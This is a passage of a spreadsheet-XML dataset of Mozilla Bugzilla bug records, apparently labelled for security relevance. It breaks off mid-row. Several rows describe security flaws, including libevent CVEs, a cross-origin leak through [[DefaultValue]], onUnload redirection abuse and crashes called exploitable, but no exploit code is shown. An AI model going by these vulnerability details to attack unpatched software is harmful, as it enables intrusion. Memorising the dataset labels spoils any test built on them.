      <c r="Q4436" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4436" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4436" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4436" t="n">
        <v>1</v>
      </c>
      <c r="U4436" t="n">
        <v>0</v>
      </c>
      <c r="V4436" t="n">
        <v>17</v>
      </c>
      <c r="W4436" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161130084355
Steps to reproduce:
Vulnerable code here is present in libevent embedded in firefox, thunderbird, xulrunner - part of the Chromium IPC code, which seems to be used for internal IPC between mozilla processes.
Previously https://www.mozilla.org/en-US/security/advisories/mfsa2015-57/ concerned Chromium IPC, and it looks like in fixing that you ensured IPC peers are authenticated.  Thus any compromise could only be through causing an IPC peer to send a dangerous message, which would force a hostname, IPv6 address or DNS packet to be parsed by libevent code from attacker-controlled input.
In decreasing order of impact:
CVE-2016-10196 is a full stack smash parsing an IPv6-like address from a &gt;2GiB string.
CVE-2016-10195 can leak ~50 bytes past the end of a malformed DNS query or response packet.
CVE-2016-10197 can read a single byte from before an empty string.
http://seclists.org/oss-sec/2017/q1/250</t>
        </is>
      </c>
      <c r="X4436" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4437">
      <c r="A4437" t="n">
        <v>524411</v>
      </c>
      <c r="B4437" t="inlineStr">
        <is>
          <t>2009-10-25 21:33:36 -0700</t>
        </is>
      </c>
      <c r="C4437" t="inlineStr">
        <is>
          <t>JetpackRuntime.Context needs removeUnloader method</t>
        </is>
      </c>
      <c r="D4437" t="inlineStr">
        <is>
          <t>2009-10-27 13:41:31 -0700</t>
        </is>
      </c>
      <c r="E4437" t="n">
        <v>1</v>
      </c>
      <c r="F4437" t="n">
        <v>1</v>
      </c>
      <c r="G4437" t="n">
        <v>6</v>
      </c>
      <c r="H4437" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4437" t="inlineStr">
        <is>
          <t>Mozilla Labs</t>
        </is>
      </c>
      <c r="J4437" t="inlineStr">
        <is>
          <t>Jetpack Prototype</t>
        </is>
      </c>
      <c r="K4437" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4437" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4437" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4437" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4437" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4437" t="inlineStr"/>
      <c r="Q4437" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4437" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4437" t="inlineStr">
        <is>
          <t>0.6</t>
        </is>
      </c>
      <c r="T4437" t="n">
        <v>1</v>
      </c>
      <c r="U4437" t="n">
        <v>0</v>
      </c>
      <c r="V4437" t="n">
        <v>9</v>
      </c>
      <c r="W4437" t="inlineStr">
        <is>
          <t>Created attachment 408322
patch
jetpack.menu frequently needs to perform some cleanup when either a doc or Jetpack context is unloaded, whichever comes first.  So it registers an unload event listener with the doc and adds an unloader using JetpackRuntime.Context.addUnloader().  When the doc is unloaded first, the context still maintains a reference to the unloader even though it's unnecessary, and the unloader hangs around until the context is unloaded.  With lots of unloaders, this is lots of memory that could be freed.  If I had a removeUnloader(), I could call it when the doc is unloaded.</t>
        </is>
      </c>
      <c r="X4437" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4438">
      <c r="A4438" t="n">
        <v>898381</v>
      </c>
      <c r="B4438" t="inlineStr">
        <is>
          <t>2013-07-26 04:24:11 -0700</t>
        </is>
      </c>
      <c r="C4438" t="inlineStr">
        <is>
          <t>IonMonkey: Fix ARM moveValue so that GC pointers are traced</t>
        </is>
      </c>
      <c r="D4438" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:29 -0800</t>
        </is>
      </c>
      <c r="E4438" t="n">
        <v>1</v>
      </c>
      <c r="F4438" t="n">
        <v>1</v>
      </c>
      <c r="G4438" t="n">
        <v>3</v>
      </c>
      <c r="H4438" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4438" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4438" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4438" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4438" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4438" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4438" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4438" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4438" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q4438" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4438" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4438" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T4438" t="n">
        <v>1</v>
      </c>
      <c r="U4438" t="n">
        <v>0</v>
      </c>
      <c r="V4438" t="n">
        <v>11</v>
      </c>
      <c r="W4438" t="inlineStr">
        <is>
          <t>Created attachment 781644
Patch
I was reading some unrelated code earlier today and noticed this. I'm not sure it can cause crashes right now, but there are some callers that pass a Value that could be an object/string I think, so let's assume it's possible.
x86/x64 already do this and grep shows this is the only place that uses payload.i32 without an isMarkable() check.</t>
        </is>
      </c>
      <c r="X4438" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4439">
      <c r="A4439" t="n">
        <v>1366369</v>
      </c>
      <c r="B4439" t="inlineStr">
        <is>
          <t>2017-05-19 12:31:50 -0700</t>
        </is>
      </c>
      <c r="C4439" t="inlineStr">
        <is>
          <t>Update Default/Dark/Light theme icons</t>
        </is>
      </c>
      <c r="D4439" t="inlineStr">
        <is>
          <t>2017-09-25 03:20:03 -0700</t>
        </is>
      </c>
      <c r="E4439" t="n">
        <v>1</v>
      </c>
      <c r="F4439" t="n">
        <v>1</v>
      </c>
      <c r="G4439" t="n">
        <v>2</v>
      </c>
      <c r="H4439" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4439" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4439" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K4439" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4439" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4439" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4439" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4439" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4439" t="inlineStr">
        <is>
          <t>[reserve-photon-visual][p3]</t>
        </is>
      </c>
      <c r="Q4439" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4439" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4439" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T4439" t="n">
        <v>1</v>
      </c>
      <c r="U4439" t="n">
        <v>2</v>
      </c>
      <c r="V4439" t="n">
        <v>15</v>
      </c>
      <c r="W4439" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1366363 +++
Firefox 57 will have compact and touch modes independently from current compact themes, but we want to keep these themes as dark/light alternatives to the default. We need to update these icons accordingly:
browser/base/content/default-theme-icon.svg
browser/base/content/defaultthemes/compactlight.icon.svg
browser/base/content/defaultthemes/compactdark.icon.svg</t>
        </is>
      </c>
      <c r="X4439" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4440">
      <c r="A4440" t="n">
        <v>14896</v>
      </c>
      <c r="B4440" t="inlineStr">
        <is>
          <t>1999-09-24 16:41:30 -0700</t>
        </is>
      </c>
      <c r="C4440" t="inlineStr">
        <is>
          <t>add regviewer component to mac build</t>
        </is>
      </c>
      <c r="D4440" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4440" t="n">
        <v>1</v>
      </c>
      <c r="F4440" t="n">
        <v>1</v>
      </c>
      <c r="G4440" t="n">
        <v>2</v>
      </c>
      <c r="H4440" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4440" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4440" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K4440" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4440" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M4440" t="inlineStr">
        <is>
          <t>Mac System 8.5</t>
        </is>
      </c>
      <c r="N4440" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4440" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4440" t="inlineStr">
        <is>
          <t>fix ready</t>
        </is>
      </c>
      <c r="Q4440" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4440" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4440" t="inlineStr">
        <is>
          <t>M10</t>
        </is>
      </c>
      <c r="T4440" t="n">
        <v>1</v>
      </c>
      <c r="U4440" t="n">
        <v>0</v>
      </c>
      <c r="V4440" t="n">
        <v>1</v>
      </c>
      <c r="W4440" t="inlineStr">
        <is>
          <t>Ugh. I forgot to check in my changes to NGLayoutBuildList.pm last week. What a
dummy.</t>
        </is>
      </c>
      <c r="X4440" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4441">
      <c r="A4441" t="n">
        <v>1887332</v>
      </c>
      <c r="B4441" t="inlineStr">
        <is>
          <t>2024-03-23 06:55:14 -0700</t>
        </is>
      </c>
      <c r="C4441" t="inlineStr">
        <is>
          <t>Null-deref at js::gc::HeaderWord::getAtomic() gc/Cell.h:100:12 with ReadGeckoProfilingStack</t>
        </is>
      </c>
      <c r="D4441" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:52 -0700</t>
        </is>
      </c>
      <c r="E4441" t="n">
        <v>1</v>
      </c>
      <c r="F4441" t="n">
        <v>1</v>
      </c>
      <c r="G4441" t="n">
        <v>3</v>
      </c>
      <c r="H4441" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4441" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4441" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K4441" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4441" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4441" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4441" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4441" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4441" t="inlineStr">
        <is>
          <t>[adv-main126+]</t>
        </is>
      </c>
      <c r="Q4441" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4441" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4441" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T4441" t="n">
        <v>1</v>
      </c>
      <c r="U4441" t="n">
        <v>0</v>
      </c>
      <c r="V4441" t="n">
        <v>14</v>
      </c>
      <c r="W4441" t="inlineStr">
        <is>
          <t>Created attachment 9392899
crash.js
Steps to reproduce:
On git commit f63ca2952da98e0817bdae0ddf1314281a497106 the attached sample crashes in the js-shell when accessing NULL, invoked as `obj-x86_64-pc-linux-gnu/dist/bin/js --fast-warmup --fuzzing-safe crash.js`
The issue seems to be related to GC and profiling; flagging as s-s as I'm not sure whether profiling is an actual prerequisite for the bug to manifest.
```
#0 0x5a1cefb4cea5 in js::gc::HeaderWord::getAtomic() const js/src/gc/Cell.h:100:12
#1 0x5a1cefb4cea5 in js::gc::HeaderWord::flags() const js/src/gc/Cell.h:116:36
#2 0x5a1cefb4cea5 in js::gc::HeaderWord::isForwarded() const js/src/gc/Cell.h:117:37
#3 0x5a1cefb4cea5 in js::gc::Cell::isForwarded() const js/src/gc/Cell.h:153:45
#4 0x5a1cefb4cea5 in bool js::gc::IsForwarded&lt;js::Shape&gt;(js::Shape const*) js/src/gc/Marking-inl.h:101:13
#5 0x5a1cefb4cea5 in js::Shape* js::gc::MaybeForwarded&lt;js::Shape*&gt;(js::Shape*) js/src/gc/Marking-inl.h:118:7
#6 0x5a1cefdcfa65 in js::NativeObject::numFixedSlotsMaybeForwarded() const js/src/vm/NativeObject-inl.h:55:10
#7 0x5a1cefdcfa65 in js::NativeObject::slotIsFixed(unsigned int) const js/src/vm/NativeObject.cpp:278:17
#8 0x5a1cef8f73cf in js::NativeObject::getFixedSlot(unsigned int) const js/src/vm/NativeObject.h:1340:5
#9 0x5a1cef8f73cf in JSFunction::flagsAndArgCountRaw() const js/src/vm/JSFunction.h:168:12
#10 0x5a1cef8f73cf in JSFunction::flags() const js/src/vm/JSFunction.h:178:35
#11 0x5a1cef8f73cf in JSFunction::isInterpreted() const js/src/vm/JSFunction.h:188:39
#12 0x5a1cef8f73cf in JSFunction::isIncomplete() const js/src/vm/JSFunction.h:528:12
#13 0x5a1cef8f722d in JSFunction::hasBytecode() const js/src/vm/JSFunction.h:226:5
#14 0x5a1cf0e94cdf in JSFunction::nonLazyScript() const js/src/vm/JSFunction.h:532:5
#15 0x5a1cf0e94cdf in js::jit::ScriptFromCalleeToken(void*) js/src/jit/ScriptFromCalleeToken.h:24:44
#16 0x5a1cf0e94cdf in js::jit::JSJitProfilingFrameIterator::frameScript() const js/src/jit/JSJitFrameIter-inl.h:41:10
#17 0x5a1cf0e945e7 in js::jit::JSJitProfilingFrameIterator::tryInitWithPC(void*) js/src/jit/JSJitFrameIter.cpp:579:22
#18 0x5a1cf0e940ce in js::jit::JSJitProfilingFrameIterator::JSJitProfilingFrameIterator(JSContext*, void*, void*) js/src/jit/JSJitFrameIter.cpp:524:7
#19 0x5a1ceffc1ccc in JS::ProfilingFrameIterator::iteratorConstruct(JS::ProfilingFrameIterator::RegisterState const&amp;) js/src/vm/Stack.cpp:572:19
#20 0x5a1ceffc1b05 in JS::ProfilingFrameIterator::ProfilingFrameIterator(JSContext*, JS::ProfilingFrameIterator::RegisterState const&amp;, mozilla::Maybe&lt;unsigned long&gt; const&amp;) js/src/vm/Stack.cpp:488:3
#21 0x5a1cf016f16c in ReadGeckoProfilingStack(JSContext*, unsigned int, JS::Value*) js/src/builtin/TestingFunctions.cpp:4595:35
#22 0x5a1cef996fe6 in CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), js::CallReason, JS::CallArgs const&amp;) js/src/vm/Interpreter.cpp:479:13
#23 0x5a1cef996201 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) js/src/vm/Interpreter.cpp:573:12
#24 0x5a1cef9ac4d0 in js::CallFromStack(JSContext*, JS::CallArgs const&amp;, js::CallReason) js/src/vm/Interpreter.cpp:645:10
#25 0x5a1cef9ac4d0 in js::Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:3060:16
#26 0x5a1cef995449 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:451:13
#27 0x5a1cef99612e in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) js/src/vm/Interpreter.cpp:605:13
#28 0x5a1cef99813d in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) js/src/vm/Interpreter.cpp:672:8
#29 0x5a1cf08fdc37 in js::jit::InvokeFunction(JSContext*, JS::Handle&lt;JSObject*&gt;, bool, bool, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/jit/VMFunctions.cpp:545:10
#30 0x5a1cf08fe7b8 in js::jit::InvokeFromInterpreterStub(JSContext*, js::jit::InterpreterStubExitFrameLayout*) js/src/jit/VMFunctions.cpp:569:8
#31 0x26c3f1d3ff1f  ([anon:js-executable-memory]+0x2f1f)
```</t>
        </is>
      </c>
      <c r="X4441" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4442">
      <c r="A4442" t="n">
        <v>528300</v>
      </c>
      <c r="B4442" t="inlineStr">
        <is>
          <t>2009-11-12 12:48:08 -0800</t>
        </is>
      </c>
      <c r="C4442" t="inlineStr">
        <is>
          <t>Crash [@ txExecutionState::~txExecutionState]</t>
        </is>
      </c>
      <c r="D4442" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:49 -0700</t>
        </is>
      </c>
      <c r="E4442" t="n">
        <v>1</v>
      </c>
      <c r="F4442" t="n">
        <v>1</v>
      </c>
      <c r="G4442" t="n">
        <v>3</v>
      </c>
      <c r="H4442" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4442" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4442" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K4442" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4442" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4442" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4442" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4442" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4442" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4442" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4442" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4442" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T4442" t="n">
        <v>1</v>
      </c>
      <c r="U4442" t="n">
        <v>0</v>
      </c>
      <c r="V4442" t="n">
        <v>22</v>
      </c>
      <c r="W4442" t="inlineStr">
        <is>
          <t>Created attachment 412043
testcase (don't load from bugzilla)
Load the testcase and refresh if it doesn't crash right away. EIP is sometimes different, especially when extra fluff is added to the transform and to the original document, so IMO this is exploitable.</t>
        </is>
      </c>
      <c r="X4442" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4443">
      <c r="A4443" t="n">
        <v>720619</v>
      </c>
      <c r="B4443" t="inlineStr">
        <is>
          <t>2012-01-23 23:20:46 -0800</t>
        </is>
      </c>
      <c r="C4443" t="inlineStr">
        <is>
          <t>Lack of security check for [[DefaultValue]]</t>
        </is>
      </c>
      <c r="D4443" t="inlineStr">
        <is>
          <t>2013-07-10 11:53:28 -0700</t>
        </is>
      </c>
      <c r="E4443" t="n">
        <v>1</v>
      </c>
      <c r="F4443" t="n">
        <v>1</v>
      </c>
      <c r="G4443" t="n">
        <v>3</v>
      </c>
      <c r="H4443" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4443" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4443" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4443" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4443" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4443" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4443" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4443" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4443" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q4443" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4443" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4443" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T4443" t="n">
        <v>1</v>
      </c>
      <c r="U4443" t="n">
        <v>0</v>
      </c>
      <c r="V4443" t="n">
        <v>111</v>
      </c>
      <c r="W4443" t="inlineStr">
        <is>
          <t>This is a regression between Firefox 6.0.2 and Firefox 7.  This seems to be a regression from bug 646129.  It seems that we unwrap security wrappers without doing security check in defaultValue().
Security problems:
* It's possible to get cross-origin window's location.href.  (This is related to bug 593602.)
* If a target page has custom window.valueOf/toString methods, it's possible to call those methods.
* It's possible to call valueOf/toString methods on a COW even if valueOf/toString are not readable.</t>
        </is>
      </c>
      <c r="X4443" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4444">
      <c r="A4444" t="n">
        <v>371360</v>
      </c>
      <c r="B4444" t="inlineStr">
        <is>
          <t>2007-02-23 04:43:26 -0800</t>
        </is>
      </c>
      <c r="C4444" t="inlineStr">
        <is>
          <t>[FIX]scripts can tailgate departing users with onUnload</t>
        </is>
      </c>
      <c r="D4444" t="inlineStr">
        <is>
          <t>2019-06-03 11:23:27 -0700</t>
        </is>
      </c>
      <c r="E4444" t="n">
        <v>1</v>
      </c>
      <c r="F4444" t="n">
        <v>1</v>
      </c>
      <c r="G4444" t="n">
        <v>3</v>
      </c>
      <c r="H4444" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4444" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4444" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4444" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4444" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4444" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4444" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4444" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4444" t="inlineStr">
        <is>
          <t>[sg:low spoof/info-leak] verify nsDocShell::InternalLoad is fixed on branch, too</t>
        </is>
      </c>
      <c r="Q4444" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4444" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4444" t="inlineStr">
        <is>
          <t>mozilla1.9alpha6</t>
        </is>
      </c>
      <c r="T4444" t="n">
        <v>1</v>
      </c>
      <c r="U4444" t="n">
        <v>3</v>
      </c>
      <c r="V4444" t="n">
        <v>103</v>
      </c>
      <c r="W4444" t="inlineStr">
        <is>
          <t>It is possible for onUnload handler to abuse document.write(), manipulate location DOM hierarchy, read back the URL for which the user is departing, and possibly redirect the browser to a typosquatting-type phishing site instead. The user is unlikely to notice:
http://lcamtuf.coredump.cx/ietrap/ff/
I have a gut feeling that this can be abused in a far more sinister way than just redirection, although document and window hierarchies are not directly accessible. Still, this is a variant of a more serious MSIE7 vulnerability (http://lcamtuf.coredump.cx/ietrap/). The MSIE7 example behaves on FF in an interesting way by itself (we end up with a page that has a favicon and URL bar entry of the target site, Ctrl-U shows attacker-generated code, but no text is displayed).
It is my impression that onUnload/onBeforeUnload handlers shouldn't be able to effectively use document.write() or manipulate location.* (alternatively, these changes shouldn't take precedence over loading of a new document).</t>
        </is>
      </c>
      <c r="X4444" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4445">
      <c r="A4445" t="n">
        <v>1964</v>
      </c>
      <c r="B4445" t="inlineStr">
        <is>
          <t>1998-12-17 10:58:10 -0800</t>
        </is>
      </c>
      <c r="C4445" t="inlineStr">
        <is>
          <t>Need to undef Perl data after freeing LDAP data</t>
        </is>
      </c>
      <c r="D4445" t="inlineStr">
        <is>
          <t>2014-03-09 06:57:50 -0700</t>
        </is>
      </c>
      <c r="E4445" t="n">
        <v>1</v>
      </c>
      <c r="F4445" t="n">
        <v>1</v>
      </c>
      <c r="G4445" t="n">
        <v>3</v>
      </c>
      <c r="H4445" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4445" t="inlineStr">
        <is>
          <t>Directory</t>
        </is>
      </c>
      <c r="J4445" t="inlineStr">
        <is>
          <t>PerLDAP</t>
        </is>
      </c>
      <c r="K4445" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4445" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4445" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N4445" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4445" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4445" t="inlineStr"/>
      <c r="Q4445" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4445" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4445" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4445" t="n">
        <v>1</v>
      </c>
      <c r="U4445" t="n">
        <v>0</v>
      </c>
      <c r="V4445" t="n">
        <v>8</v>
      </c>
      <c r="W4445" t="inlineStr">
        <is>
          <t>After calling LDAP API _free() functions, we should also *always* undef the Perl
variable. For instance with msgfree(), which can cause serious problems.
This was reported by Michael Konopka @Netscape.</t>
        </is>
      </c>
      <c r="X4445" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4446">
      <c r="A4446" t="n">
        <v>194394</v>
      </c>
      <c r="B4446" t="inlineStr">
        <is>
          <t>2003-02-21 09:43:42 -0800</t>
        </is>
      </c>
      <c r="C4446" t="inlineStr">
        <is>
          <t>Internal error/previous qa still acts as qa_contact, after turning useqacontact off</t>
        </is>
      </c>
      <c r="D4446" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:35 -0800</t>
        </is>
      </c>
      <c r="E4446" t="n">
        <v>1</v>
      </c>
      <c r="F4446" t="n">
        <v>1</v>
      </c>
      <c r="G4446" t="n">
        <v>4</v>
      </c>
      <c r="H4446" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4446" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4446" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4446" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4446" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4446" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4446" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4446" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4446" t="inlineStr">
        <is>
          <t>[fixed in 2.16.3] [fixed in 2.17.4]</t>
        </is>
      </c>
      <c r="Q4446" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4446" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4446" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T4446" t="n">
        <v>1</v>
      </c>
      <c r="U4446" t="n">
        <v>0</v>
      </c>
      <c r="V4446" t="n">
        <v>17</v>
      </c>
      <c r="W4446" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3b) Gecko/20030218
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3b) Gecko/20030218
Bugs with a qa contact cannot be viewed after turning off useqacontact. Trying
to do so, results in the following error message:
Internal Error
undef error - Can't use string ("4") as a HASH ref while "strict refs" in use at
Bug.pm line 382.
qa contact is the user with userid 4. Turning on useqacontact brings the bugs back.
Reproducible: Always
Steps to Reproduce:
1. set useqacontact on
2. Create a bug and assign qa
3. turn useqacontact off
4. try to view the created bug
Actual Results:  
Internal error</t>
        </is>
      </c>
      <c r="X4446" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4447">
      <c r="A4447" t="n">
        <v>26979</v>
      </c>
      <c r="B4447" t="inlineStr">
        <is>
          <t>2000-02-08 10:51:26 -0800</t>
        </is>
      </c>
      <c r="C4447" t="inlineStr">
        <is>
          <t>window.open crashing.</t>
        </is>
      </c>
      <c r="D4447" t="inlineStr">
        <is>
          <t>2000-02-15 13:59:15 -0800</t>
        </is>
      </c>
      <c r="E4447" t="n">
        <v>1</v>
      </c>
      <c r="F4447" t="n">
        <v>1</v>
      </c>
      <c r="G4447" t="n">
        <v>3</v>
      </c>
      <c r="H4447" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4447" t="inlineStr">
        <is>
